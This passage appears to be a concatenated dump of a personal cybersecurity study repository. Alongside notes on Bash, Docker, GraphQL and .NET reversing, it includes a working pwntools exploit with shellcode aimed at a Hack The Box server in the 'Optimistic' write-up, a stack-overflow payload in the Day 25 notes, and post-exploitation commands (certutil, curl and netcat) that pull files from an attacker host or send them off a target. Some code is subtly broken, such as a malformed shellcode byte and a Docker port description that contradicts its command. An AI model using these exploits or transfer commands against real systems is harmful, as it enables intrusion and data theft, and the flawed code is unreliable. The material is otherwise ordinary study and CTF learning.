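    `value` may be the raw bytes, or the integer a debugger prints for EIP,
    which on a little-endian (LSB) binary is decoded as such."""
    if isinstance(value, int):
        value = value.to_bytes(n, "little")
    return pattern_create(length, n).find(value)


if __name__ == "__main__":
    pat = pattern_create(1000)
    # Pretend the crash left pat[112:116] in EIP; gdb shows it as a
    # little-endian integer, so decode it the same way before looking it up.
    eip = int.from_bytes(pat[112:116], "little")
    print(f"EIP=0x{eip:08x} -> offset {pattern_offset(eip)}")
```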
```bash
gdb-peda$ pattern_create 1000 # creates a cyclic pattern; after the crash, use pattern_offset on the value found in EIP
gdb-peda$ pattern_offset 0x4e734138 # tells us the offset at which EIP is overwritten
```

Also some necessary things to check beforehand:

Check which endianness is used. For this we can run `readelf` or `file` on the binary and we will see if it is LSB (Least Significant Bit, little endian) or MSB (Most Significant Bit, big endian).
Then check the security of the binary and what we are allowed to do: for example, is NX enabled (if so we cannot place shellcode on the stack and execute it), and what else we would have to bypass, like ASLR.

--------------------------------------------------------------------------------
/Day 2 - More about Stacks and Linux BOF/optimistic.md:
--------------------------------------------------------------------------------
### Optimistic : HTB Challenges : Pwn

```
References used: PinkDraconian video about this topic: https://www.youtube.com/watch?v=MVeRz2ZdSdk
```

Here let's first analyze the security features and architecture of the binary.

```bash
$ checksec optimistic
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
```

```bash
$ file optimistic
optimistic: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=24f4b065a2eab20657772e85de2af83b2f6fe8b1, for GNU/Linux 3.2.0, not stripped
```

Now let's analyze the binary in Ghidra. As this binary is not stripped we can see function names and symbols; loading it into Ghidra we see there are two custom functions here:

![Ghidra Main Function](main.png)

![Ghidra Initialize Function](intialize.png)

In the initialize function there is an `alarm` call which fires after 30 seconds and stops the binary. For building our payload we can patch this function so the alarm fires after 255 seconds instead, giving us a lot more time to work with.

By analyzing the main function in Ghidra we can see that it gives us a stack address when we press `y`, and we can see that we are getting the base pointer address. Further analyzing the binary, we see that there is an unsigned integer value initialized which is then cast to a signed integer and compared against the byte count. Due to how unsigned and signed integers work, we get an integer overflow if we supply -1 for that unsigned value: -1 is not in the range of an unsigned integer and wraps to its maximum value, and when cast back to a signed integer it becomes -1 again, because 255, the maximum of an unsigned byte, does not exist in the signed range. This passes the length check and allows us to conduct a stack overflow here.

```python
from pwn import *


def main():
    context(os='linux', arch='amd64')
    # io = process('./optimistic_patched')
    io = remote('139.59.169.46', 30872)
    # First step is to enumerate
    padding = 104
    stack_offset = -96

    # Step 1: get the leaked stack address
    io.sendlineafter(b': ', b'y')
    stack_address = io.recvline().decode().strip().split()[-1][2:]
    stack_address = bytes.fromhex(stack_address).rjust(8, b'\x00')
    stack_address = u64(stack_address, endian='big')  # as an integer it is easy to add offsets to
    stack_address += stack_offset
    log.success(f'Gottem: {p64(stack_address)}')

    # Stack address calculation:
    # We leaked a stack address but we want to know its location relative to the
    # buffer we can overflow. We have to jump back 96 bytes, as char local_68 in
    # main is 96 bytes and our payload starts at the beginning of that buffer.

    # Step 2: buffer overflow
    io.sendlineafter(b'Email: ', b'ab')
    io.sendlineafter(b'Age: ', b'ab')
    io.sendlineafter(b'Length of name: ', b'-1')
    # Only alphanumeric characters are allowed in this shellcode
    shellcode = b"XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V"
    padding = b'a' * (padding - len(shellcode))
    payload = shellcode + padding + p64(stack_address)
    io.sendlineafter(b'Name: ', payload)
    io.interactive()


main()
```

--------------------------------------------------------------------------------
/Day 20- File Transfers/README.md:
--------------------------------------------------------------------------------
# File Transfers

So what is post exploitation? It basically consists of things like file transfers, port forwarding, pivoting, maintaining access, clean up etc.
To do file transfers we will use tools like certutil, ftp, the browser and wget.

### File Transfers / Certutil.exe

HTTP server hosting with Python:

```bash
python -m SimpleHTTPServer 80
```

Getting the file on the Windows machine using certutil:

```bash
certutil.exe -urlcache -f link filename
```

### FTP Transfer

You can host an FTP server on the attacker machine and then connect to it from the victim machine:

```bash
python -m pyftpdlib 21 # host it like this

ftp # get it like this
```

### WGET Transfer

```bash
wget link # works on Linux only though
```

### Metasploit

If you have a meterpreter shell you can use the built-in functions of Metasploit to upload and download files.

```bash
upload filename # to upload filename to the target machine
download filename # to download filename from the target machine
```

### Netcat File Transfer

On the listening end where you want to receive the file:

```bash
nc -l -p 1234 > filefromtargertbrr
```

From where you want to send the file:

```bash
nc -w 3 1234 < filefromtargertbrr
```

### Curl File Transfer

Host files using python3 from the attacker machine:

```bash
python3 -m http.server 80
```

To download them:

```bash
curl http://:/filefromattackerbrr -o fileoutput
```

### SMB Server

To host files from a Linux machine:

```bash
sudo smbserver.py Share /folder/youwannashare
```

Get them on the Windows machine like this:

```powershell
net view \\10.10.10.10 # lists all the shares
dir \\10.10.10.10\Share # lists files in the Share
copy \\10.10.10.10\Share\filename . # copies a file from the Share
```

---

Linux:

```bash
smbclient -L 10.10.10.10 # to list shares
smbclient \\\\10.10.10.10\\Share # to connect to the share; then you can download files using get
```

### Base64 File Transfer

To turn a file into base64:

```bash
cat exploit.py | base64
```

Turn a command or one-liner into base64:

```bash
echo "Hello" | base64
```

Then to turn this text back and write it to a file on Linux we can use:

```bash
echo -n "SGVsbG8K" | base64 -d > file
```
--------------------------------------------------------------------------------
/Day 21 - Pwntools Usage Basics/README.md:
--------------------------------------------------------------------------------
Main resource used: https://docs.pwntools.com/en/stable/globals.html
This is to provide a basic idea and some basic commands to use in pwntools.

To install it:
```bash
sudo pip install pwn
```

Most common way to use it:
```python
from pwn import *
```

Defining the context of the binary:
```python
context(os='linux', arch='amd64')
```
This provides pwntools with context on what the architecture, OS, bit width etc. are. This helps when you are, let's say, trying to generate shellcode, and also in cases where you are doing ROP, etc. It's always recommended to set this. A shortcut to set everything automatically from the binary is:
```python
from pwn import *
context.binary = "./your-vulnbinary"
```
Default values and all the values that you can edit and add can be found here: https://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.defaults

Tubes:
This is how you talk to sockets, SSH connections and processes with pwntools:
```python
# Remote socket connection
io = remote("IP/Host", PORT)
# Attaching to a local process
io = process('./binary')
```

ShellCraft:
This is a module you can use to create shellcode for binaries super easily in case NX is disabled:
```python
shellcode = asm(shellcraft.sh())
```
You can also look at ways to play around with this shellcode generation here:

Sending inputs:
Here `> ` is what the program prints before asking for our input:
```python
io.sendlineafter(b'> ', b'whatyouwannasend')
```

p64, u64:

p64 is to pack a 64-bit integer/address, and you can provide p64 with the following fields: number, endianness, sign.
```python
p64(stack_address)
```
u64 is to reverse this effect and unpack the 64-bit integer from its packed form:
```python
u64(stack_address)
```
ROP module:
This tool can be used to build ROP chains pretty trivially.

## More to be added here later ##
--------------------------------------------------------------------------------
/Day 22 - GraphQL Basic Techniques/README.md:
--------------------------------------------------------------------------------
Main resources used:
TryHackMe GraphQL room: https://tryhackme.com/room/graphql
Hacking GraphQL For Beginners by Farah Hawa: https://www.youtube.com/watch?v=OQCgmftU-Og

GraphQL is a query language and a way to interact with APIs, just like REST.

The main difference between this and REST APIs is how you query and how they return that information.

A normal GraphQL query can look like this:

```graphql
{
  Cereal(name: "Lucky Charms") {
    sugar
    protein
  }
}
```

and this will give us output like so:

```json
{
  "data": {
    "Cereal": {
      "sugar": "500mg",
      "protein": "0mg"
    }
  }
}
```

### How does it work?

Let's see how we can write these queries.

This is the basic template of how they work:

```graphql
{
  type {
    field
    field
    ...
  }
}
```

Developers set up schemas to use GraphQL. A schema is basically where we define what types are available to use. In the schema, Query is the root type; anything here is allowed to be queried, and in this Query type we can set up arguments that we can use to filter the query, like, let's say, the id or name of a product.

The second part is the type, where we define all the fields that can return data in our response.

The main benefit of GraphQL is flexibility: we can get as much or as little data as we want.

Then the way the functions (resolvers) return the data is written.
Then we have the root variable which tells which function to use when dealing with which object.
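GraphQL servers describe their own schema through the built-in `__schema` type (introspection), so the schema, root Query type and field arguments discussed above can be read straight off a server's response. This added example (not part of the original notes) parses a constructed introspection response in the shape a server returns, lists the developer-defined object types with their field signatures and the root Query entry points, and flags field names that suggest data a schema should not advertise; the `User.passwordHash` field in the sample is constructed to show that check.

```python
"""Parse a GraphQL introspection (__schema) response and summarise what the
schema advertises. Added example, not from the original notes; the response
is constructed in the shape a GraphQL server returns."""
import json

SAMPLE_RESPONSE = json.dumps({"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "Cereal",
             "args": [{"name": "name", "type": {"name": "String", "kind": "SCALAR", "ofType": None}}],
             "type": {"name": "Cereal", "kind": "OBJECT", "ofType": None}},
            {"name": "users", "args": [],
             "type": {"name": None, "kind": "LIST",
                      "ofType": {"name": "User", "kind": "OBJECT", "ofType": None}}}]},
        {"name": "Cereal", "kind": "OBJECT", "fields": [
            {"name": "sugar", "args": [], "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
            {"name": "protein", "args": [], "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "id", "args": [], "type": {"name": "ID", "kind": "SCALAR", "ofType": None}},
            {"name": "passwordHash", "args": [],  # constructed: a field that should not be exposed
             "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]},
        {"name": "String", "kind": "SCALAR", "fields": None},
        {"name": "ID", "kind": "SCALAR", "fields": None},
        {"name": "__Schema", "kind": "OBJECT", "fields": []},  # built-in introspection type
    ]}}})


def type_name(t):
    """Render a possibly wrapped type reference, e.g. [User] or String!."""
    if t is None:
        return "?"
    if t["kind"] == "LIST":
        return "[" + type_name(t["ofType"]) + "]"
    if t["kind"] == "NON_NULL":
        return type_name(t["ofType"]) + "!"
    return t["name"]


def user_defined_types(response_text):
    """{type name: [field signatures]} for developer-defined OBJECT types,
    skipping scalars and the built-in types whose names start with '__'."""
    schema = json.loads(response_text)["data"]["__schema"]
    result = {}
    for t in schema["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        sigs = []
        for f in t.get("fields") or []:
            args = ", ".join(f"{a['name']}: {type_name(a['type'])}" for a in f["args"])
            head = f"{f['name']}({args})" if args else f["name"]
            sigs.append(f"{head}: {type_name(f['type'])}")
        result[t["name"]] = sigs
    return result


def root_query_fields(response_text):
    """Names of the searchable entry points on the root Query type."""
    schema = json.loads(response_text)["data"]["__schema"]
    root = schema["queryType"]["name"]
    return [f["name"] for t in schema["types"] if t["name"] == root
            for f in t["fields"]]


def sensitive_fields(response_text, keywords=("password", "token", "secret", "hash")):
    """Type.field names whose wording suggests data that should not be
    exposed; a quick review aid when reading what a schema advertises."""
    hits = []
    for tname, sigs in user_defined_types(response_text).items():
        for sig in sigs:
            fname = sig.split(":")[0].split("(")[0]
            if any(k in fname.lower() for k in keywords):
                hits.append(f"{tname}.{fname}")
    return hits


if __name__ == "__main__":
    for name, fields in user_defined_types(SAMPLE_RESPONSE).items():
        print(name, fields)
    print("root query fields:", root_query_fields(SAMPLE_RESPONSE))
    print("review:", sensitive_fields(SAMPLE_RESPONSE))
```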
GraphQL, luckily for us, documents itself pretty well: it comes with certain objects, types and fields that allow us to get information on all the other types.

So basically we can gain a lot of information without even fuzzing endpoints.

All the types defined in the schema are documented through the `__schema` object, so we can get all the info about types from here. To learn about the types we can use the field `types`, then we can query the fields we want.

Then we can use `__type` to build objects and use a parameter to specify which type we want more information on.

To get the schema and information about a GraphQL API we can use:
```graphql
query Introspection {
  __schema {
    types {
      name
      description
    }
  }
}
```

A great extension to inspect and edit these GraphQL queries in Burp Suite is InQL.
--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/README.md:
--------------------------------------------------------------------------------
Resources used: https://tryhackme.com/room/linuxmodules

# Basic Syntax

Declaring variables:

```bash
#!/usr/bin/env bash

NAME="John"
echo "Hello $NAME!"
echo $NAME
echo "$NAME"
echo "${NAME}!"
```

Functions:

```bash
# One way
myfunc() {
    echo "hello $1"
}
# Second way
function myfunc() {
    echo "hello $1"
}
# Calling it
myfunc "John"
```

```bash
# Declaring local variables in functions
myfunc() {
    local myresult='some value'
    echo "$myresult"
}
```

Raising errors:

```bash
myfunc() {
    return 1
}
if myfunc; then
    echo "success"
else
    echo "failure"
fi
```

Defining arrays:

```bash
Fruits=('Apple' 'Banana' 'Orange')

Fruits[0]="Apple"
Fruits[1]="Banana"
Fruits[2]="Orange"
```

Operations on these arrays:

```bash
Fruits=("${Fruits[@]}" "Watermelon")    # Push
Fruits+=('Watermelon')                  # Also push
Fruits=( "${Fruits[@]/Ap*/}" )          # Remove by pattern match (leaves an empty element behind)
unset 'Fruits[2]'                       # Remove one item
Fruits=("${Fruits[@]}")                 # Duplicate (also re-indexes after unset)
Fruits=("${Fruits[@]}" "${Veggies[@]}") # Concatenate
mapfile -t lines < "logfile"            # Read lines from a file, one per element
echo "${Fruits[0]}"                     # Element #0
echo "${Fruits[-1]}"                    # Last element
echo "${Fruits[@]}"                     # All elements, space-separated
echo "${#Fruits[@]}"                    # Number of elements
echo "${#Fruits}"                       # String length of the 1st element
echo "${#Fruits[3]}"                    # String length of the Nth element
echo "${Fruits[@]:3:2}"                 # Range (from position 3, length 2)
echo "${!Fruits[@]}"                    # Keys of all elements, space-separated
```

Iterating over an array:

```bash
for i in "${arrayName[@]}"; do
    echo "$i"
done
```

For loops:

```bash
# Basic loop
for i in /etc/rc.*; do
    echo "$i"
done
# C-style loop
for ((i = 0; i < 100; i++)); do
    echo "$i"
done
# With ranges
for i in {1..5}; do
    echo "Welcome $i"
done
```

Passing positional arguments:

```bash
#!/bin/bash

# To get positional arguments we can use $1 like so
# String concatenation also works inside " "
echo "Hello there! $1"
```

Setting default values:

```bash
#!/bin/bash

name=${1:-"Something"}
echo "My name is $name."
```

This sets the default value of name to "Something" if no argument is passed to the script.

To raise an error if the $1 argument is not passed we can do this:

```bash
#!/bin/bash

name=${1:?"Yo asked your name mahn?"}
echo "My name is $name."
```

Raise an error if more arguments than needed are passed:

```bash
if [ $# -ne 1 ]; then
    echo "Usage: Hello Hello Hello"
    exit 1
fi
echo "We good Homie, $1"
exit 0
```

### Some tools that help make life a little better for us

du: This command shows disk usage and which directory uses how much space. Size is shown in KB by default. Some ways to run it:

```bash
du # Shows disk usage of all directories in the current dir
du -a # Shows disk usage of files as well as directories
du -h # Lists sizes in human-readable units (K, M, G)
du -d N # Limits output to N levels of depth
```

grep: This is used to search a file for a certain pattern and display the lines where that pattern is found/matched.

Basic syntax goes something like this:

```bash
grep "PATTERN" file.txt
```

The patterns can be of two types:

1. Find things using a regex:

```bash
grep -E "regex" file.txt
# or we can use egrep
egrep "regex" file.txt
# Example:
grep -E "([1-9])\w+" grep.txt # matches a digit 1-9 followed by word characters
```

2. Find things using a fixed string inside the text:

```bash
grep -F "Plus Ultra" file.txt # matches lines that contain Plus Ultra
# or we can use fgrep
fgrep "string" file.txt
```

You can then use flags like:
-R : recursive grep on the files inside the folders; by default it's not recursive.
-h : hides the file names if you are doing recursive searching.
-i : ignores the case of the value (doesn't care if it's lowercase or uppercase).

You can use `man grep` to get the manual for grep and more things it can be used for.

Also, to build and test regexes you can use this website: https://regexr.com/

tr: This is the translate command. It helps with a lot of string operations, like changing character case in a string or replacing characters in a string.

Syntax:

```
tr [flag] [source]/[find]/[select] [destination]/[replace]/[change]
```

Some of the flags are:
-d : delete a given set of characters
-t : truncate the source set to the length of the destination set
-s : squeeze repeats, replacing a run of the same character from the set with a single one
-c : this is a reverse, so basically your filter applies to everything that doesn't match the set

Examples:

```bash
cat file.txt | tr -d 'a-cA-C= ' # used on tr.txt from the test files this prints Youdidit
# Turn all the content of newtr.txt to lowercase
cat newtr.txt | tr '[:upper:]' '[:lower:]'
```

AWK: This is an all-in-one tool and is basically a scripting language used to manipulate data and generate reports.

Syntax: `awk [flags] [select pattern/find(sort)/commands] [input file]`
P.S.: You can also pipe output into it.

You can also write a script and pass it like so:

```bash
awk -f script.awk file.txt
```

Now let's get to the basic usage of this tool:

```bash
awk '{print}' file.txt # Print the text as it is
awk '/pattern/' file.txt # The pattern is enclosed inside / / and matched against each line of file.txt
```

uniq: This filters the output and removes adjacent duplicate lines, so we get the unique entries.

```bash
cat uniq.txt | uniq
```

sort: This sorts the lines alphabetically and numerically.

```bash
cat sort.txt | sort
```
--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/testfiles/awk.txt:
--------------------------------------------------------------------------------
Yo Best Friendo
Nice Pitch
Yo mahn
Hello there

--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/testfiles/grep.txt:
--------------------------------------------------------------------------------
Plus Ultra
12324 hello
yo yo yo yo yo
--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/testfiles/newtr.txt:
--------------------------------------------------------------------------------
Youdidit
--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/testfiles/sort.txt:
--------------------------------------------------------------------------------
Alohaoy
222 jojo
Jojo
Majima
Goro
7
Kiryu
Kazuma
--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/testfiles/tr.txt:
--------------------------------------------------------------------------------
Yo=====u dAAAAiACCCCdBBBiaaaaaaaaAAAABBBCCCCAAAAt
--------------------------------------------------------------------------------
/Day 23 - Linux Command Line and Bash/testfiles/uniq.txt:
--------------------------------------------------------------------------------
Hello
Hello
Hello
Shalom
Labas
Yo
--------------------------------------------------------------------------------
/Day 24 - Powershell Basics/README.md:
--------------------------------------------------------------------------------
Resources to learn from: https://docs.microsoft.com/en-us/learn/modules/introduction-to-powershell/

PowerShell is:

1. A command-line shell
2. A scripting language
3. Designed to be a task engine
4. A framework to automate tasks in Windows, and now even cross-platform.

It provides access to almost everything in the Windows platform and AD environment.

Features:

1. Has a built-in help system: you can see which commands it supports and what their capabilities are.
2. Pipeline functionality to allow running many commands sequentially, so basically the output of the previous command is the input for the next one.
3. Aliases are basically shortcuts/alternate names which you can set/map to certain commands.
4. It operates on objects, so you spend less time formatting and extracting things.
5. Cmdlets are commands in PowerShell and are built on a common runtime rather than separate executables, to provide consistent behaviour.
6. There are many types of commands in PowerShell, which can be native executables, cmdlets, functions, scripts or aliases.

--------------------------------------------------------------------------------
/Day 25 - x64 Linux Binary Exploitation (1)/README.md:
--------------------------------------------------------------------------------
Resources used: https://www.youtube.com/watch?v=gxU3e7GbC-M : x64 Linux Binary Exploitation Training: Source Meets Sink | https://www.theoffensivelabs.com/p/x64-linux-binary-exploitation-live-training

So let's start with our basic buffer overflow. I am using the code the course provided us with:
```c
#include <stdio.h>
#include <string.h>

void vuln_func(char *input);

int main(int argc, char *argv[]) {
    if (argc > 1)
        vuln_func(argv[1]);
    return 0;
}

void vuln_func(char *input) {
    char buffer[256];
    strcpy(buffer, input); // no length check: input longer than 256 bytes overflows buffer
}
```
(This code was taken from the course, and is not written by me)

Then we can use gcc to compile the code for us without any protections. For most of our exploit development core files are very important, as they hold all the information about the crash for us, and they are generated automatically when we get a segfault. If one isn't generated automatically we can use:

```bash
ulimit -c unlimited
```

Then from this core file we can analyse whatever happened in the crash; we can analyse these core files using gdb like this:
```bash
gdb -core core
```

With 64-bit we won't by default see 4141414141 in RIP, due to a concept called canonical addresses, so with these exploits we usually overwrite RBP, and if that's overwritten that's all we need out of the box.

We can load up binaries in GDB like so:

```
gdb ./binary
```
Ideally you would also want to run checksec on the binary, but as we compiled it ourselves we know it has no security features enabled.
and then if we have a payload file we can pass our payload to the binary like this :

```
run $(cat payloadfile)
```

Ideally it is also a good idea to put a breakpoint at main to analyse the registers.
We can disassemble and see the assembly code of a function using the command `disas main` or `disas func`.

Breakpoints are set using `b *address` and then you can continue with `c`.

So we won't be able to overwrite RIP directly: if you look at the vmmap of the binary you will see that out of the 64 bits only 48 bits are used, which is called canonical addressing. When you address memory you can only use 48-bit addresses, but when we overwrite the return address we are passing it 8 bytes (64 bits) of a non-canonical address, and RIP won't accept it; those upper addresses are only used by the kernel. To pass a canonical address to RIP we need to get the offset to RBP and then use that information to overwrite RIP with only 6 bytes, so the address stays canonical.
To get this offset we can use pattern_create, which is a module in gdb-peda, which is what I am using :

```bash
gdb-peda> pattern_create 400 payload.txt
gdb-peda> run $(cat payload.txt)
```

After doing this with a payload large enough to cause a segfault and overwrite RBP, we can copy the value in RBP and use pattern_offset :

```bash
gdb-peda> pattern_offset "RBPText"
```

and it will give us the exact offset to overwrite RBP. Now we can overwrite RBP using the offset, supplying 8 bytes for RBP (where non-canonical bytes are fine) and then a canonical 6-byte address that overwrites RIP, like so :

```python
# Assuming the offset to the saved RBP is 128
padding = b"A" * 128
rbpvalue = b"B" * 8   # saved RBP: any 8 bytes, canonical or not
ripvalue = b"C" * 6   # saved RIP: only 6 bytes, so the address stays canonical
```

`ret` does `pop rip`, which pops the value on the top of the stack into RIP. Here is some shellcode from the course that we can use :

```
\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\xd50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05
```

Now we can use the shellcode, adjust the padding and build a payload to exploit this.
```python
offset = 128
shellcode = b"\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\xd50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"

nop = b"\x90" * 12   # NOP sled in front of the shellcode

# The sled and shellcode live inside the buffer, so shrink the padding by their length
offset = offset - len(shellcode) - len(nop)
padding = b"A" * offset
rbpvalue = b"B" * 8   # saved RBP: non-canonical bytes are fine here
ripvalue = b"C" * 6   # saved RIP: 6 bytes so the address stays canonical
payload = nop + shellcode + padding + rbpvalue + ripvalue

with open("payload.txt", "wb") as f:   # passed to the binary with: run $(cat payload.txt)
    f.write(payload)
```

Now we need to find the address where our payload is stored, using gdb and the `x/50gx` command, printing the memory near $rsp and subtracting a little bit of the padding we sent from it, like this :

```bash
x/50gx $rsp-140
```

But sometimes we won't get the exact same address in gdb that we get while executing outside it. That is when we can use the core file to see where the address is, modify our exploit, and then gg.

If the function uses an even more vulnerable function like gets, we can use instructions like `JMP RSP` or `JMP RBX` and point RIP at them. In the case of `JMP RSP` we would need to have our shellcode right after the RIP, as `JMP RSP` jumps to the top of the stack and our code, which is directly after the return address, is what will be at the top of the stack.

`JMP RBX` on the other hand works only when the shellcode address is in RBX; then we can use a `JMP RBX` gadget and jump to it.
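To make the canonical-address point above concrete, here is a small Python helper, added for these notes and not part of the course or the original write-up, that checks whether a 64-bit value is canonical and shows why the 6-byte overwrite of the saved return address lands on an accepted address while eight 0x41 bytes do not. All addresses used are constructed sample values.

```python
# Added example for these notes (not from the course or the notes above): what
# "canonical" means on x86-64 and why the 6-byte overwrite described above works.
# All addresses in the demo and tests are constructed sample values.

VA_BITS = 48  # x86-64 with 4-level paging uses 48 significant address bits


def is_canonical(addr):
    """True if bits 63..48 are all copies of bit 47, the CPU's canonical-form rule."""
    if not 0 <= addr < (1 << 64):
        raise ValueError("address must fit in 64 bits")
    top = addr >> (VA_BITS - 1)                       # the 17 bits from bit 47 upwards
    return top in (0, (1 << (64 - VA_BITS + 1)) - 1)  # all zeros or all ones


def classify(addr):
    """'user' for the lower canonical half, 'kernel' for the upper, else 'non-canonical'."""
    if not is_canonical(addr):
        return "non-canonical"
    return "user" if addr < (1 << (VA_BITS - 1)) else "kernel"


def bytes_to_addr(raw):
    """Interpret up to 8 little-endian stack bytes as the saved return address.

    With strcpy the overwrite stops at the terminating NUL, so after 6 bytes of
    input the 7th byte is 0 and the 8th keeps its old value (0 for a user-space
    address); zero-extending here models that situation.
    """
    if len(raw) > 8:
        raise ValueError("at most 8 bytes")
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


if __name__ == "__main__":
    for label, raw in (("8 x 'A' (RBP slot)", b"A" * 8), ("6 x 'C' (RIP slot)", b"C" * 6)):
        addr = bytes_to_addr(raw)
        print(f"{label}: {addr:#018x} -> {classify(addr)}")
```

The rule the CPU applies is simply sign extension from bit 47: any value whose top 17 bits are not all equal faults on `ret`, which is why the RBP slot can hold arbitrary bytes while the RIP slot cannot.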
/Day 26 - .NET Executing Reversing/Images/flag.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/flag.png
/Day 26 - .NET Executing Reversing/Images/importing.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/importing.png
/Day 26 - .NET Executing Reversing/Images/main1.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/main1.png
/Day 26 - .NET Executing Reversing/Images/main2.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/main2.png
/Day 26 - .NET Executing Reversing/Images/online.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/online.png

/Day 26 - .NET Executing Reversing/README.md:

This is a fairly basic reversing challenge which deals with basic C# reversing and decompiling binaries written in C#.

For this we can use tools like dnSpy, which can be downloaded from here : https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8 . Download the version for your OS, unzip it and that's it.

Now let's load the binary in dnSpy using the File option and selecting the EXE. Here we see there are three functions when the binary loads up :

![error](./Images/importing.png)

We will be most interested in the main function at first, analysing what that function is doing :

![woah error](./Images/main1.png)
![woah error](./Images/main2.png)

Here we can see that there is an if/else statement and a try/catch that runs if the if statement matches. When we analyse it, it seems it is going to ask for an input of sorts, that input is called num, and the if statement is `if ((num ^ num2) == num3)`, so we have to somehow find out what the input would have to be to match this if statement.

Here it says : num3 = num ^ num2, so num = num2 ^ num3, and we have the values for num2 and num3, so let's use an online compiler to find this value. Here is the code :

```csharp
using System;

public class Program
{
    public static void Main()
    {
        long num2 = 53129566096L;
        long num3 = 65535655351L;
        long result = num2 ^ num3;   // XOR is its own inverse, so this recovers num
        Console.WriteLine(result);
    }
}
```

This is the online compiler I used : https://dotnetfiddle.net/

![error](./Images/online.png)

Here we can now just run the program, use this number and get the flag, easy peasy.

P.S. Decompiling and modifying the C# program's if statement to avoid the condition won't work here, as it is going to give us an error in the catch statement, because we need the num value to decode the string which has the flag.

![error](./Images/flag.png)

We can also use breakpoints in dnSpy to see the variables at a certain point and just locally set variables that way sometimes.
/Day 27 - Docker/README.md:

Resources used :
1. https://madhuakula.com/content/introduction-to-docker-containers/#/4
2. https://www.youtube.com/watch?v=gAkwW2tuIqE : Learn Docker in 7 Easy Steps : Fireship

Docker is a container-based virtualization approach where we use the kernel of the host's OS to run multiple guest instances, which are called containers.

Each container has : a root file system, processes, memory, devices, network ports.

Containers help us wrap a piece of software in a complete filesystem that contains everything we need to install and run the application the way we would like it to run for everyone, and hence avoid the "it ran fine on my computer" situation: it runs the same on every system.

Main concepts:
1. Image : Read-only, with the OS, libraries and apps. It is the blueprint of the containers and what containers are built from.
2. Container : Stateful instance of an image with a writeable layer; think of it as a house built with the image as its blueprint.
3. Docker Registry : A repository of images, like GitHub is for code; one of the major public Docker registries is Docker Hub (https://hub.docker.com/).
4. Dockerfile : The steps that are taken by Docker to create the blueprint (image). So you are drawing out the blueprint using this Dockerfile.
Main tools/products in Docker :

Docker Engine : Core functions to build Docker images and create and start Docker containers.
Docker Machine : Automated container provisioning.
Docker Swarm : Allows container clustering and scheduling.
Docker Compose : Allows you to define multi-container environments and operate them.

Then some basic commands to use in Docker :

To build :
1. Build an image from the Dockerfile in the current directory, with a tag and version number 1.0 :

`docker build -t imagename:1.0 .`

2. List all the images that are locally stored with the Docker Engine :
`docker image ls`

3. Delete an image from the local image store :
`docker image rm alpine:3.4`

To run :
1. Show all running containers : `docker container ls`
2. Run a container with an image and name, then expose port 500 externally mapped to port 80 inside the container : `docker container run --name web -p 3000:80 image:1.0`
3. List the networks : `docker network ls`
4. Stop a running container through SIGTERM : `docker container stop containername`

/Day 28 - Mitre/Attack.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 28 - Mitre/Attack.png

/Day 28 - Mitre/README.md:

```
Resource Used : https://tryhackme.com/room/mitre
```

### Basic Terminology:

APT : Advanced Persistent Threat, which can be a team/group or even a nation-state group that engages in long-term attacks against organizations/countries.

TTP : Tactics, Techniques and Procedures :
Tactic : Goal or objective
Technique : How they achieve the goal
Procedure : How the technique is executed.

### ATT&CK Framework:

This is a globally accessible knowledge base of adversary TTPs based on real-life observations of APTs. It is a resource that a lot of people in the industry contribute to and maintain :

![](./Attack.png)

Here there are 14 main categories (tactics), which contain the techniques (which sometimes contain sub-techniques if needed) which the adversary could use to perform the tactic. If we want more information we can just click on the topic, which will give us a brief description, procedure examples and mitigations.

/Day 29 - File Inclusion/Pasted image 20211011233528.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 29 - File Inclusion/Pasted image 20211011233528.png
/Day 29 - File Inclusion/Pasted image 20211011233544.png: https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 29 - File Inclusion/Pasted image 20211011233544.png

/Day 29 - File Inclusion/README.md:

```
